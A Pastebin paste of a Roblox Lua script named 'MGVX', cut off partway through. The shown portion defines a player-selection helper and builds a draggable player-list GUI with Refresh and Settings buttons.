Advertisement
jech

Untitled

Jun 16th, 2016
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 77.63 KB | None | 0 0
  1.  
  2.  
  3. local CoreValues = Instance.new("Folder")
  4. CoreValues.Name = "MGVXCore"
  5. CoreValues.Parent = game
  6.  
  7.  
  8. local Http = game:GetService("HttpService")
  9. local gWorkspace = game:GetService("Workspace")
  10. local OwnerGui = game:GetService("Players").LocalPlayer.PlayerGui
  11. local Players = game:GetService("Players")
  12. local Website = "http://mgvx.tk/"
  13.  
  14. -- Makes Sure EveryThing Goes Ok!---
  15. print("MGVX LOADED")
  16.  
  17.  
  18. --------
  19. local WhiteList = {}
  20. local BlackListed = {}
  21.  
  22. -- Variables---
  23.  
  24. Owner = game.Players.LocalPlayer
  25. local plr = Owner
  26.  
  27. for i,v in pairs(game.Players:GetChildren())do if v.Name ~= plr then otherp = v end end
  28.  
  29.  
  30.  
  31. ------------Functions----------
  32. function GetPlr(plr, str)
  33. local plrz = {} str = str:lower()
  34. if str == "all" then plrz = game.Players:children()
  35. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  36. else
  37. local sn = {1} local en = {}
  38. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  39. for x = 1, #sn do
  40. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  41. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  42. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  43. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  44. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  45. end end end
  46. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  47. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  48. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  49. end end end
  50. else
  51. for a, plyr in pairs(game.Players:children()) do
  52. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  53. table.insert(plrz, plyr) break
  54. end
  55. end
  56. end
  57. end
  58. end
  59. return plrz
  60. end
  61.  
  62.  
  63. local OtherP = Instance.new("StringValue")
  64. OtherP.Name = "OtherP"
  65. OtherP.Value = otherp.Name
  66. OtherP.Parent = CoreValues
  67.  
  68. local OwnerV = Instance.new("StringValue")
  69. OwnerV.Name = "Owner"
  70. OwnerV.Value = Owner.Name
  71. OwnerV.Parent = CoreValues
  72.  
  73.  
  74.  
  75. local NewGuiPart1 = Instance.new("ScreenGui")
  76. NewGuiPart1.Name = "MGVX"
  77. NewGuiPart1.Parent = Owner.PlayerGui
  78.  
  79.  
  80.  
  81. -------
  82. local NewGuiPart2 = Instance.new("Frame")
  83. NewGuiPart2.Active = true
  84. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  85. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  86. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  87. NewGuiPart2.ClipsDescendants = true
  88. NewGuiPart2.Draggable = true
  89. NewGuiPart2.Parent = NewGuiPart1
  90. -------
  91. local NewGuiPart3 = Instance.new("TextButton")
  92. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  93. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  94. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  95. NewGuiPart3.BorderSizePixel = 0
  96. NewGuiPart3.Name = "TL1"
  97. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  98. NewGuiPart3.Selectable = true
  99. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  100. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  101. NewGuiPart3.FontSize = Enum.FontSize.Size14
  102. NewGuiPart3.Text = "Refresh"
  103. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  104. NewGuiPart3.Parent = NewGuiPart2
  105. -------
  106. local NewGuiPart4 = Instance.new("TextLabel")
  107. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  108. NewGuiPart4.BackgroundTransparency = 1
  109. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  110. NewGuiPart4.BorderSizePixel = 0
  111. NewGuiPart4.Name = "TL2"
  112. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  113. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  114. NewGuiPart4.FontSize = Enum.FontSize.Size14
  115. NewGuiPart4.Text = "Loading..."
  116. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  117. NewGuiPart4.TextScaled = true
  118. NewGuiPart4.TextWrapped = true
  119. NewGuiPart4.Parent = NewGuiPart2
  120. -------
  121. local NewGuiPart5 = Instance.new("Frame")
  122. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  123. NewGuiPart5.BackgroundTransparency = 1
  124. NewGuiPart5.BorderSizePixel = 5
  125. NewGuiPart5.Name = "Main"
  126. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  127. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  128. NewGuiPart5.Visible = false
  129. NewGuiPart5.Draggable = true
  130. NewGuiPart5.Parent = NewGuiPart2
  131. -------
  132. local NewGuiPart6 = Instance.new("ScrollingFrame")
  133. NewGuiPart6.BackgroundTransparency = 1
  134. NewGuiPart6.Name = "PlayerList"
  135. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  136. NewGuiPart6.Selectable = true
  137. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  138. NewGuiPart6.ClipsDescendants = true
  139. NewGuiPart6.Parent = NewGuiPart5
  140. -------
  141. local NewGuiPart7 = Instance.new("Frame")
  142. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  143. NewGuiPart7.BackgroundTransparency = 1
  144. NewGuiPart7.BorderSizePixel = 0
  145. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  146. NewGuiPart7.Parent = NewGuiPart6
  147. -------
  148. local NewGuiPart8 = Instance.new("ImageLabel")
  149. NewGuiPart8.Active = false
  150. NewGuiPart8.BackgroundTransparency = 1
  151. NewGuiPart8.BorderSizePixel = 0
  152. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  153. NewGuiPart8.Selectable = false
  154. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  155. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  156. NewGuiPart8.Parent = NewGuiPart7
  157. -------
  158. local NewGuiPart9 = Instance.new("TextLabel")
  159. NewGuiPart9.BackgroundTransparency = 1
  160. NewGuiPart9.BorderSizePixel = 0
  161. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  162. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  163. NewGuiPart9.Font = Enum.Font.Legacy
  164. NewGuiPart9.FontSize = Enum.FontSize.Size10
  165. NewGuiPart9.Text = ""
  166. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  167. NewGuiPart9.TextScaled = true
  168. NewGuiPart9.TextWrapped = true
  169. NewGuiPart9.Parent = NewGuiPart7
  170. -------
  171. local NewGuiPart10 = Instance.new("Frame")
  172. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  173. NewGuiPart10.BackgroundTransparency = 1
  174. NewGuiPart10.BorderSizePixel = 0
  175. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  176. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  177. NewGuiPart10.Parent = NewGuiPart6
  178. -------
  179. local NewGuiPart11 = Instance.new("ImageLabel")
  180. NewGuiPart11.Active = false
  181. NewGuiPart11.BackgroundTransparency = 1
  182. NewGuiPart11.BorderSizePixel = 0
  183. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  184. NewGuiPart11.Selectable = false
  185. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  186. NewGuiPart11.Image = ""
  187. NewGuiPart11.Parent = NewGuiPart10
  188. -------
  189. local NewGuiPart12 = Instance.new("TextLabel")
  190. NewGuiPart12.BackgroundTransparency = 1
  191. NewGuiPart12.BorderSizePixel = 0
  192. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  193. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  194. NewGuiPart12.Font = Enum.Font.Legacy
  195. NewGuiPart12.FontSize = Enum.FontSize.Size10
  196. NewGuiPart12.Text = ""
  197. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  198. NewGuiPart12.TextScaled = true
  199. NewGuiPart12.TextWrapped = true
  200. NewGuiPart12.Parent = NewGuiPart10
  201. -------
  202. local NewGuiPart13 = Instance.new("Frame")
  203. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  204. NewGuiPart13.BackgroundTransparency = 1
  205. NewGuiPart13.BorderSizePixel = 0
  206. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  207. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  208. NewGuiPart13.Parent = NewGuiPart6
  209. -------
  210. local NewGuiPart14 = Instance.new("ImageLabel")
  211. NewGuiPart14.Active = false
  212. NewGuiPart14.BackgroundTransparency = 1
  213. NewGuiPart14.BorderSizePixel = 0
  214. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  215. NewGuiPart14.Selectable = false
  216. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  217. NewGuiPart14.Image = ""
  218. NewGuiPart14.Image = ""
  219. NewGuiPart14.Parent = NewGuiPart13
  220. -------
  221. local NewGuiPart15 = Instance.new("TextLabel")
  222. NewGuiPart15.BackgroundTransparency = 1
  223. NewGuiPart15.BorderSizePixel = 0
  224. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  225. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  226. NewGuiPart15.Font = Enum.Font.Legacy
  227. NewGuiPart15.FontSize = Enum.FontSize.Size10
  228. NewGuiPart15.Text = ""
  229. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  230. NewGuiPart15.TextScaled = true
  231. NewGuiPart15.TextWrapped = true
  232. NewGuiPart15.Parent = NewGuiPart13
  233. -------
  234. local NewGuiPart16 = Instance.new("Frame")
  235. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  236. NewGuiPart16.BackgroundTransparency = 1
  237. NewGuiPart16.BorderSizePixel = 0
  238. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  239. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  240. NewGuiPart16.Parent = NewGuiPart6
  241. -------
  242. local NewGuiPart17 = Instance.new("ImageLabel")
  243. NewGuiPart17.Active = false
  244. NewGuiPart17.BackgroundTransparency = 1
  245. NewGuiPart17.BorderSizePixel = 0
  246. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  247. NewGuiPart17.Selectable = false
  248. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  249. NewGuiPart17.Image = ""
  250. NewGuiPart17.Image = ""
  251. NewGuiPart17.Parent = NewGuiPart16
  252. -------
  253. local NewGuiPart18 = Instance.new("TextLabel")
  254. NewGuiPart18.BackgroundTransparency = 1
  255. NewGuiPart18.BorderSizePixel = 0
  256. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  257. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  258. NewGuiPart18.Font = Enum.Font.Legacy
  259. NewGuiPart18.FontSize = Enum.FontSize.Size10
  260. NewGuiPart18.Text = ""
  261. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  262. NewGuiPart18.TextScaled = true
  263. NewGuiPart18.TextWrapped = true
  264. NewGuiPart18.Parent = NewGuiPart16
  265. -------
  266. local NewGuiPart19 = Instance.new("Frame")
  267. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  268. NewGuiPart19.BackgroundTransparency = 1
  269. NewGuiPart19.BorderSizePixel = 0
  270. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  271. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  272. NewGuiPart19.Parent = NewGuiPart6
  273. -------
  274. local NewGuiPart20 = Instance.new("ImageLabel")
  275. NewGuiPart20.Active = false
  276. NewGuiPart20.BackgroundTransparency = 1
  277. NewGuiPart20.BorderSizePixel = 0
  278. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  279. NewGuiPart20.Selectable = false
  280. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  281. NewGuiPart20.Image = ""
  282. NewGuiPart20.Image = ""
  283. NewGuiPart20.Parent = NewGuiPart19
  284. -------
  285. local NewGuiPart21 = Instance.new("TextLabel")
  286. NewGuiPart21.BackgroundTransparency = 1
  287. NewGuiPart21.BorderSizePixel = 0
  288. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  289. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  290. NewGuiPart21.Font = Enum.Font.Legacy
  291. NewGuiPart21.FontSize = Enum.FontSize.Size10
  292. NewGuiPart21.Text = ""
  293. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  294. NewGuiPart21.TextScaled = true
  295. NewGuiPart21.TextWrapped = true
  296. NewGuiPart21.Parent = NewGuiPart19
  297. -------
  298. local NewGuiPart22 = Instance.new("Frame")
  299. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  300. NewGuiPart22.BackgroundTransparency = 1
  301. NewGuiPart22.BorderSizePixel = 0
  302. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  303. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  304. NewGuiPart22.Parent = NewGuiPart6
  305. -------
  306. local NewGuiPart23 = Instance.new("ImageLabel")
  307. NewGuiPart23.Active = false
  308. NewGuiPart23.BackgroundTransparency = 1
  309. NewGuiPart23.BorderSizePixel = 0
  310. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  311. NewGuiPart23.Selectable = false
  312. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  313. NewGuiPart23.Image = ""
  314. NewGuiPart23.Image = ""
  315. NewGuiPart23.Parent = NewGuiPart22
  316. -------
  317. local NewGuiPart24 = Instance.new("TextLabel")
  318. NewGuiPart24.BackgroundTransparency = 1
  319. NewGuiPart24.BorderSizePixel = 0
  320. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  321. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  322. NewGuiPart24.Font = Enum.Font.Legacy
  323. NewGuiPart24.FontSize = Enum.FontSize.Size10
  324. NewGuiPart24.Text = ""
  325. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  326. NewGuiPart24.TextScaled = true
  327. NewGuiPart24.TextWrapped = true
  328. NewGuiPart24.Parent = NewGuiPart22
  329. -------
  330. local NewGuiPart25 = Instance.new("Frame")
  331. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  332. NewGuiPart25.BackgroundTransparency = 1
  333. NewGuiPart25.BorderSizePixel = 0
  334. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  335. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  336. NewGuiPart25.Parent = NewGuiPart6
  337. -------
  338. local NewGuiPart26 = Instance.new("ImageLabel")
  339. NewGuiPart26.Active = false
  340. NewGuiPart26.BackgroundTransparency = 1
  341. NewGuiPart26.BorderSizePixel = 0
  342. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  343. NewGuiPart26.Selectable = false
  344. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  345. NewGuiPart26.Image = ""
  346. NewGuiPart26.Image = ""
  347. NewGuiPart26.Parent = NewGuiPart25
  348. -------
  349. local NewGuiPart27 = Instance.new("TextLabel")
  350. NewGuiPart27.BackgroundTransparency = 1
  351. NewGuiPart27.BorderSizePixel = 0
  352. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  353. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  354. NewGuiPart27.Font = Enum.Font.Legacy
  355. NewGuiPart27.FontSize = Enum.FontSize.Size10
  356. NewGuiPart27.Text = ""
  357. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  358. NewGuiPart27.TextScaled = true
  359. NewGuiPart27.TextWrapped = true
  360. NewGuiPart27.Parent = NewGuiPart25
  361. -------
  362. local NewGuiPart28 = Instance.new("Frame")
  363. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  364. NewGuiPart28.BackgroundTransparency = 1
  365. NewGuiPart28.BorderSizePixel = 0
  366. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  367. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  368. NewGuiPart28.Parent = NewGuiPart6
  369. -------
  370. local NewGuiPart29 = Instance.new("ImageLabel")
  371. NewGuiPart29.Active = false
  372. NewGuiPart29.BackgroundTransparency = 1
  373. NewGuiPart29.BorderSizePixel = 0
  374. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  375. NewGuiPart29.Selectable = false
  376. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  377. NewGuiPart29.Image = ""
  378. NewGuiPart29.Image = ""
  379. NewGuiPart29.Parent = NewGuiPart28
  380. -------
  381. local NewGuiPart30 = Instance.new("TextLabel")
  382. NewGuiPart30.BackgroundTransparency = 1
  383. NewGuiPart30.BorderSizePixel = 0
  384. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  385. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  386. NewGuiPart30.Font = Enum.Font.Legacy
  387. NewGuiPart30.FontSize = Enum.FontSize.Size10
  388. NewGuiPart30.Text = ""
  389. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  390. NewGuiPart30.TextScaled = true
  391. NewGuiPart30.TextWrapped = true
  392. NewGuiPart30.Parent = NewGuiPart28
  393. -------
  394. local NewGuiPart31 = Instance.new("Frame")
  395. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  396. NewGuiPart31.BackgroundTransparency = 1
  397. NewGuiPart31.BorderSizePixel = 0
  398. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  399. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  400. NewGuiPart31.Parent = NewGuiPart6
  401. -------
  402. local NewGuiPart32 = Instance.new("ImageLabel")
  403. NewGuiPart32.Active = false
  404. NewGuiPart32.BackgroundTransparency = 1
  405. NewGuiPart32.BorderSizePixel = 0
  406. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  407. NewGuiPart32.Selectable = false
  408. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  409. NewGuiPart32.Image = ""
  410. NewGuiPart32.Image = ""
  411. NewGuiPart32.Parent = NewGuiPart31
  412. -------
  413. local NewGuiPart33 = Instance.new("TextLabel")
  414. NewGuiPart33.BackgroundTransparency = 1
  415. NewGuiPart33.BorderSizePixel = 0
  416. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  417. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  418. NewGuiPart33.Font = Enum.Font.Legacy
  419. NewGuiPart33.FontSize = Enum.FontSize.Size10
  420. NewGuiPart33.Text = ""
  421. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  422. NewGuiPart33.TextScaled = true
  423. NewGuiPart33.TextWrapped = true
  424. NewGuiPart33.Parent = NewGuiPart31
  425. -------
  426. local NewGuiPart34 = Instance.new("Frame")
  427. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  428. NewGuiPart34.BackgroundTransparency = 1
  429. NewGuiPart34.BorderSizePixel = 0
  430. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  431. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  432. NewGuiPart34.Parent = NewGuiPart6
  433. -------
  434. local NewGuiPart35 = Instance.new("ImageLabel")
  435. NewGuiPart35.Active = false
  436. NewGuiPart35.BackgroundTransparency = 1
  437. NewGuiPart35.BorderSizePixel = 0
  438. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  439. NewGuiPart35.Selectable = false
  440. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  441. NewGuiPart35.Image = ""
  442. NewGuiPart35.Image = ""
  443. NewGuiPart35.Parent = NewGuiPart34
  444. -------
  445. local NewGuiPart36 = Instance.new("TextLabel")
  446. NewGuiPart36.BackgroundTransparency = 1
  447. NewGuiPart36.BorderSizePixel = 0
  448. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  449. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  450. NewGuiPart36.Font = Enum.Font.Legacy
  451. NewGuiPart36.FontSize = Enum.FontSize.Size10
  452. NewGuiPart36.Text = ""
  453. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  454. NewGuiPart36.TextScaled = true
  455. NewGuiPart36.TextWrapped = true
  456. NewGuiPart36.Parent = NewGuiPart34
  457. -------
  458. local NewGuiPart37 = Instance.new("Frame")
  459. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  460. NewGuiPart37.BackgroundTransparency = 1
  461. NewGuiPart37.BorderSizePixel = 0
  462. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  463. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  464. NewGuiPart37.Parent = NewGuiPart6
  465. -------
  466. local NewGuiPart38 = Instance.new("ImageLabel")
  467. NewGuiPart38.Active = false
  468. NewGuiPart38.BackgroundTransparency = 1
  469. NewGuiPart38.BorderSizePixel = 0
  470. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  471. NewGuiPart38.Selectable = false
  472. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  473. NewGuiPart38.Image = ""
  474. NewGuiPart38.Image = ""
  475. NewGuiPart38.Parent = NewGuiPart37
  476. -------
  477. local NewGuiPart39 = Instance.new("TextLabel")
  478. NewGuiPart39.BackgroundTransparency = 1
  479. NewGuiPart39.BorderSizePixel = 0
  480. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  481. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  482. NewGuiPart39.Font = Enum.Font.Legacy
  483. NewGuiPart39.FontSize = Enum.FontSize.Size10
  484. NewGuiPart39.Text = ""
  485. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  486. NewGuiPart39.TextScaled = true
  487. NewGuiPart39.TextWrapped = true
  488. NewGuiPart39.Parent = NewGuiPart37
  489. -------
  490. local NewGuiPart40 = Instance.new("Frame")
  491. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  492. NewGuiPart40.BackgroundTransparency = 1
  493. NewGuiPart40.BorderSizePixel = 0
  494. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  495. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  496. NewGuiPart40.Parent = NewGuiPart6
  497. -------
  498. local NewGuiPart41 = Instance.new("ImageLabel")
  499. NewGuiPart41.Active = false
  500. NewGuiPart41.BackgroundTransparency = 1
  501. NewGuiPart41.BorderSizePixel = 0
  502. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  503. NewGuiPart41.Selectable = false
  504. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  505. NewGuiPart41.Image = ""
  506. NewGuiPart41.Image = ""
  507. NewGuiPart41.Parent = NewGuiPart40
  508. -------
  509. local NewGuiPart42 = Instance.new("TextLabel")
  510. NewGuiPart42.BackgroundTransparency = 1
  511. NewGuiPart42.BorderSizePixel = 0
  512. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  513. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  514. NewGuiPart42.Font = Enum.Font.Legacy
  515. NewGuiPart42.FontSize = Enum.FontSize.Size10
  516. NewGuiPart42.Text = ""
  517. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  518. NewGuiPart42.TextScaled = true
  519. NewGuiPart42.TextWrapped = true
  520. NewGuiPart42.Parent = NewGuiPart40
  521. -------
  522. local NewGuiPart43 = Instance.new("Frame")
  523. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  524. NewGuiPart43.BackgroundTransparency = 1
  525. NewGuiPart43.BorderSizePixel = 0
  526. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  527. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  528. NewGuiPart43.Parent = NewGuiPart6
  529. -------
  530. local NewGuiPart44 = Instance.new("ImageLabel")
  531. NewGuiPart44.Active = false
  532. NewGuiPart44.BackgroundTransparency = 1
  533. NewGuiPart44.BorderSizePixel = 0
  534. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  535. NewGuiPart44.Selectable = false
  536. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  537. NewGuiPart44.Image = ""
  538. NewGuiPart44.Image = ""
  539. NewGuiPart44.Parent = NewGuiPart43
  540. -------
  541. local NewGuiPart45 = Instance.new("TextLabel")
  542. NewGuiPart45.BackgroundTransparency = 1
  543. NewGuiPart45.BorderSizePixel = 0
  544. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  545. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  546. NewGuiPart45.Font = Enum.Font.Legacy
  547. NewGuiPart45.FontSize = Enum.FontSize.Size10
  548. NewGuiPart45.Text = ""
  549. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  550. NewGuiPart45.TextScaled = true
  551. NewGuiPart45.TextWrapped = true
  552. NewGuiPart45.Parent = NewGuiPart43
  553. -------
  554. local NewGuiPart46 = Instance.new("Frame")
  555. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  556. NewGuiPart46.BackgroundTransparency = 1
  557. NewGuiPart46.BorderSizePixel = 0
  558. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  559. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  560. NewGuiPart46.Parent = NewGuiPart6
  561. -------
  562. local NewGuiPart47 = Instance.new("ImageLabel")
  563. NewGuiPart47.Active = false
  564. NewGuiPart47.BackgroundTransparency = 1
  565. NewGuiPart47.BorderSizePixel = 0
  566. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  567. NewGuiPart47.Selectable = false
  568. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  569. NewGuiPart47.Image = ""
  570. NewGuiPart47.Image = ""
  571. NewGuiPart47.Parent = NewGuiPart46
  572. -------
  573. local NewGuiPart48 = Instance.new("TextLabel")
  574. NewGuiPart48.BackgroundTransparency = 1
  575. NewGuiPart48.BorderSizePixel = 0
  576. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  577. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  578. NewGuiPart48.Font = Enum.Font.Legacy
  579. NewGuiPart48.FontSize = Enum.FontSize.Size10
  580. NewGuiPart48.Text = ""
  581. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  582. NewGuiPart48.TextScaled = true
  583. NewGuiPart48.TextWrapped = true
  584. NewGuiPart48.Parent = NewGuiPart46
  585. -------
  586. local NewGuiPart49 = Instance.new("TextButton")
  587. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  588. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  589. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  590. NewGuiPart49.BorderSizePixel = 0
  591. NewGuiPart49.Name = "TL3"
  592. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  593. NewGuiPart49.Selectable = true
  594. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  595. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  596. NewGuiPart49.FontSize = Enum.FontSize.Size14
  597. NewGuiPart49.Text = "Settings"
  598. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  599. NewGuiPart49.Parent = NewGuiPart2
  600. -------
  601. local NewGuiPart50 = Instance.new("Frame")
  602. NewGuiPart50.BackgroundTransparency = 1
  603. NewGuiPart50.Name = "ScrollingFrame"
  604. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
  605. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  606. NewGuiPart50.Visible = false
  607. NewGuiPart50.ClipsDescendants = true
  608. NewGuiPart50.Draggable = true
  609. NewGuiPart50.Parent = NewGuiPart2
  610.  
  611. -------
  612. local NewGuiPart52 = Instance.new("TextBox")
  613. NewGuiPart52.Active = false
  614. NewGuiPart52.BackgroundTransparency = 0.5
